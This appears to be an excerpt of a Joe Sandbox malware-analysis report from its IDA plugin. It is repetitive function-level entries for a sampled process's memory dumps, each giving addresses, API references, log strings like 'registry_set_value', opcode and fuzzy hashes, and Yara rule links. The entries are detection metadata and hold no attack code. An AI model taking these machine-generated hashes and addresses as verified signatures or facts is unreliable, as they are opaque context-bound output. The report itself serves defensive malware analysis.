Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 0c6b05e59e831c7e199db39c08246d60a0e1b9e38502d795e3b27ec33d1e38d1
Instruction ID: 5393c416ee496d65244a3e57e23b0784ef923a76df67f3fa916aecb2c951916f
Opcode Fuzzy Hash: 0c6b05e59e831c7e199db39c08246d60a0e1b9e38502d795e3b27ec33d1e38d1
Instruction Fuzzy Hash: D5F0BE53B08D0341FB139A46B8413BD224A2F413B4E6904B9CD190B6F2EE3DAC828220

Function 00007FFE13303BB9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
Instruction ID: 5e36432166459c1223ea2b41f05623d7ee7d51c3fef118a13bf4f7f1a6c99294
Opcode Fuzzy Hash: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
Instruction Fuzzy Hash: 6EF0BE23B09E0249FA529A06B4407BE12411F60374E0901B2CD2D6B6E1EE3DAC878208

Function 00007FFE13303BB2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
Instruction ID: 04afcb6d773d3b176d47330c1eea07e3c9741799fd754d110b7561d7b3804af4
Opcode Fuzzy Hash: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
Instruction Fuzzy Hash: FFF0BE23F09E0249FA529A06B4407BE12411F60374E0901B1CD2D2B2E1EE3DAC878208

Function 00007FFE13303BAB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
Instruction ID: 2cfad29a25d025878c5124cd53bef9a082a48deddfa73b40465188ec2dca256f
Opcode Fuzzy Hash: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
Instruction Fuzzy Hash: 00F0BE23B09E0249FA529A06B4417BE12411F60374E0901B1CD3D2B2E2EE3DAC878208

Function 00007FFE13303BA4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
Instruction ID: 8d5bf5e3610cb8bdb82ec85c1d9cc3ea00b71e768511f85e28fd516a867290f1
Opcode Fuzzy Hash: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
Instruction Fuzzy Hash: A6F0BE23B09E0649FA529A06B4407BE12411F60374E0902B1CD2D2B2E2EE3DAC878208

Function 00007FFE13303B9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
Instruction ID: 78166d0d8a01eb0fd521c170b04adb0262f7d392b0b24d786895fe33c28cd1df
Opcode Fuzzy Hash: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
Instruction Fuzzy Hash: 93F0BE23F09E0249FA529A06B4407BE12412F60370E0901B1CD2D2B2E1EE3DA8878208

Function 00007FFE13303BF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
Instruction ID: 5e36432166459c1223ea2b41f05623d7ee7d51c3fef118a13bf4f7f1a6c99294
Opcode Fuzzy Hash: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
Instruction Fuzzy Hash: 6EF0BE23B09E0249FA529A06B4407BE12411F60374E0901B2CD2D6B6E1EE3DAC878208

Function 00007FFE13303BEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
Instruction ID: 04afcb6d773d3b176d47330c1eea07e3c9741799fd754d110b7561d7b3804af4
Opcode Fuzzy Hash: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
Instruction Fuzzy Hash: FFF0BE23F09E0249FA529A06B4407BE12411F60374E0901B1CD2D2B2E1EE3DAC878208

Function 00007FFE13303BE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
Instruction ID: 2cfad29a25d025878c5124cd53bef9a082a48deddfa73b40465188ec2dca256f
Opcode Fuzzy Hash: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
Instruction Fuzzy Hash: 00F0BE23B09E0249FA529A06B4417BE12411F60374E0901B1CD3D2B2E2EE3DAC878208

Function 00007FFE13303BDD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
Instruction ID: 8d5bf5e3610cb8bdb82ec85c1d9cc3ea00b71e768511f85e28fd516a867290f1
Opcode Fuzzy Hash: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
Instruction Fuzzy Hash: A6F0BE23B09E0649FA529A06B4407BE12411F60374E0902B1CD2D2B2E2EE3DAC878208

Function 00007FFE13303BD6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
Instruction ID: 78166d0d8a01eb0fd521c170b04adb0262f7d392b0b24d786895fe33c28cd1df
Opcode Fuzzy Hash: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
Instruction Fuzzy Hash: 93F0BE23F09E0249FA529A06B4407BE12412F60370E0901B1CD2D2B2E1EE3DA8878208

Function 00007FFE13303CF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3830d5c9bcfa35e30f395fa6a2070ccb228ab19e6bc5d0af7ce4f20ee2511ab0
Instruction ID: c3ea6ab3f89881f6f0e380f75cda5592a8aff1677aa6880eb0105e5d3bb5b5e4
Opcode Fuzzy Hash: 3830d5c9bcfa35e30f395fa6a2070ccb228ab19e6bc5d0af7ce4f20ee2511ab0
Instruction Fuzzy Hash: 85F0BE23B09E0649FA529A06B4407BE12411F60370E0902B1CD2D2B7E2EE3DAC879208

Function 00007FFE13303CED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b233857000ff338559f6e4fdf725ba4cf6212be17939af09ef085f7bb0742ba9
Instruction ID: c3fe13e7254e37ad19198d9b04d9b8475c44ad19c2a43833ad9eb24fa534eca1
Opcode Fuzzy Hash: b233857000ff338559f6e4fdf725ba4cf6212be17939af09ef085f7bb0742ba9
Instruction Fuzzy Hash: A1F0BE23F09E0249FA529A06B4407BE12412F60370E0901B1CD2C2B7E1EE3DA8879208

Function 00007FFE13303D01 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13303C15

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
fs_file_read, xrefs: 00007FFE13303C52

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 558382feb5cb909b06dd18dc82b80ede7c11bccf5cce58ebe0d1e603f10e5164
Instruction ID: 3302f5c9e145f8f764d2460a8d9ed803361fe0d3757a4dc5b7a49dd6416057ea
Opcode Fuzzy Hash: 558382feb5cb909b06dd18dc82b80ede7c11bccf5cce58ebe0d1e603f10e5164
Instruction Fuzzy Hash: ECF0BE23B09E0249FA529A06B4417BE12411F60370E0901B1CD3D2B7E2EE3DAC879208

Function 00007FFE1150E1A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150E175

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE1150E18E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150E195

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 970c09d0dcd5ea34f1a46dc12fd34a0edf7691e351c06cd1f2e05a77389e8ae6
Instruction ID: 200be1dddbaa2830efe77fefce95834de1e14b57fd2cc1f3b9328bdc4c21d2b6
Opcode Fuzzy Hash: 970c09d0dcd5ea34f1a46dc12fd34a0edf7691e351c06cd1f2e05a77389e8ae6
Instruction Fuzzy Hash: F1E09262A0CE0680E7519B82FC004BD3219EF807A0F4441B9D94E465B09E2CE589E301

Function 00007FFE1150E164 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150E175

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE1150E18E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150E195

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 4bb574007704d611733c35ed3aec0597b95f3c12bec7a3ab01b222fd3b9032a5
Instruction ID: bbf5e35d0ffd49ee9e470a948460f96f0cdefe381f76ef98bfc0156643ca264e
Opcode Fuzzy Hash: 4bb574007704d611733c35ed3aec0597b95f3c12bec7a3ab01b222fd3b9032a5
Instruction Fuzzy Hash: 27E09262A0CE0681E7119B82BC004BD3219EF807A0F4401B9D94E465B09E2CE985E301

Function 00007FFE1150E156 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150E175

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE1150E18E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150E195

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: ff28b797b5508f40563d36ad7b99ab8af3a4bf2d9dee5be4e765f66e119b214b
Instruction ID: 373518fb08e75ad8cbd3c489cab1625e0208648f6dbdeae458327bf86d11d1bc
Opcode Fuzzy Hash: ff28b797b5508f40563d36ad7b99ab8af3a4bf2d9dee5be4e765f66e119b214b
Instruction Fuzzy Hash: EBE09262A0CE0680E7119B82BC004BD321DEF807A0F4401B9D94E465B09E2CEA85E302

Function 00007FFE1150E0C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150E175

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE1150E18E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150E195

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

